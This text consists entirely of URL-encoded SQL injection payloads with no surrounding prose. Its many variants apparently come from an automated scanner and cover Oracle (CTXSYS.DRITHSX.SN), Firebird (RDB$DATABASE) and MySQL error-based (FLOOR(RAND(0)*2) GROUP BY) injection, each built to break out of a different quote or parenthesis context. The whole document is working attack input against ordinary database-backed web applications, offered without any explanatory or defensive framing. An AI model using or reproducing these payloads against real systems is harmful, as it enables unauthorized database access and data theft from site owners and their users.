1%27%29%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27FBoX%27%3D%27FBoX 1%27%29%29%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27VFIU%27%3D%27VFIU 1%27%29%29%29%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27WPON%27%3D%27WPON 1%27%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%27jzNJ%27%3D%27jzNJ 1%27%29%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27YkmA%27%20LIKE%20%27YkmA 1%27%29%29%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27wTob%27%20LIKE%20%27wTob 1%27%29%29%29%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27GTBN%27%20LIKE%20%27GTBN 1%27%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%27elYH%27%20LIKE%20%27elYH 1%22%29%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22xvqz%22%3D%22xvqz 1%22%29%29%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22iRQh%22%3D%22iRQh 1%22%29%29%29%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22TXPe%22%3D%22TXPe 1%22%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%22pHrb%22%3D%22pHrb 1%22%29%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22KeSp%22%20LIKE%20%22KeSp 1%22%29%29%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22CymA%22%20LIKE%20%22CymA 1%22%29%29%29%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22eOiz%22%20LIKE%20%22eOiz 1%22%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%22pktp%22%20LIKE%20%22pktp 1%29%20WHERE%206202%3D6202%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29 1%27%29%20WHERE%206840%3D6840%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29 1%27%20WHERE%207735%3D7735%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29 1%22%20WHERE%205616%3D5616%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29 1%27%20%7C%7C%20%28SELECT%205137%20FROM%20DUAL%20WHERE%206948%3D6948%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201904%20WHERE%202080%3D2080%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%203860%20FROM%20DUAL%20WHERE%208273%3D8273%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20%29 1%20%2B%20%28SELECT%207604%20WHERE%204095%3D4095%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20%29 1%27%20%2B%20%28SELECT%20%27Rimp%27%20FROM%20DUAL%20WHERE%205721%3D5721%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27LLlN%27%20WHERE%208549%3D8549%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%209801%3DCTXSYS.DRITHSX.SN%289801%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289801%3D9801%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20%23 1%29%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29 1%27%29%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29 1%27%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29 1%22%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29 1%29%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%286533%3D6533 1%29%29%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%281678%3D1678 1%29%29%29%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%28%282738%3D2738 1%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29 1%27%29%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%27LyoR%27%3D%27LyoR 1%27%29%29%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%28%27XOTn%27%3D%27XOTn 1%27%29%29%29%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%28%28%27osbw%27%3D%27osbw 1%27%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%27XBUu%27%3D%27XBUu 1%27%29%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%27hXHc%27%20LIKE%20%27hXHc 1%27%29%29%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%28%27fvUq%27%20LIKE%20%27fvUq 1%27%29%29%29%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%28%28%27cSrK%27%20LIKE%20%27cSrK 1%27%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%27uFSq%27%20LIKE%20%27uFSq 1%22%29%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%22AJIK%22%3D%22AJIK 1%22%29%29%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%28%22UBoL%22%3D%22UBoL 1%22%29%29%29%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%28%28%22OqZv%22%3D%22OqZv 1%22%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%22tYco%22%3D%22tYco 1%22%29%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%22OgOi%22%20LIKE%20%22OgOi 1%22%29%29%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%28%22GuYb%22%20LIKE%20%22GuYb 1%22%29%29%29%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%28%28%22eQCw%22%20LIKE%20%22eQCw 1%22%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%22avBT%22%20LIKE%20%22avBT 1%29%20WHERE%203241%3D3241%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29 1%27%29%20WHERE%207070%3D7070%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29 1%27%20WHERE%207406%3D7406%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29 1%22%20WHERE%209095%3D9095%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29 1%27%20%7C%7C%20%28SELECT%209076%20FROM%20DUAL%20WHERE%208493%3D8493%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205700%20WHERE%209526%3D9526%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%201375%20FROM%20DUAL%20WHERE%208315%3D8315%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20%29 1%20%2B%20%28SELECT%209381%20WHERE%204172%3D4172%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20%29 1%27%20%2B%20%28SELECT%20%27sTAQ%27%20FROM%20DUAL%20WHERE%201429%3D1429%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27qzdM%27%20WHERE%204103%3D4103%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%208757%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%208757%20WHEN%208757%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20%23 -4239%29%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -3517%27%29%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -2311%27%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -5633%22%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -1743%29%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%283082%3D3082 -1164%29%29%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%287410%3D7410 -7374%29%29%29%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%288799%3D8799 -2177%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -3065%27%29%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27rJqv%27%3D%27rJqv -8196%27%29%29%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27oYbh%27%3D%27oYbh -6751%27%29%29%29%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27RLGw%27%3D%27RLGw 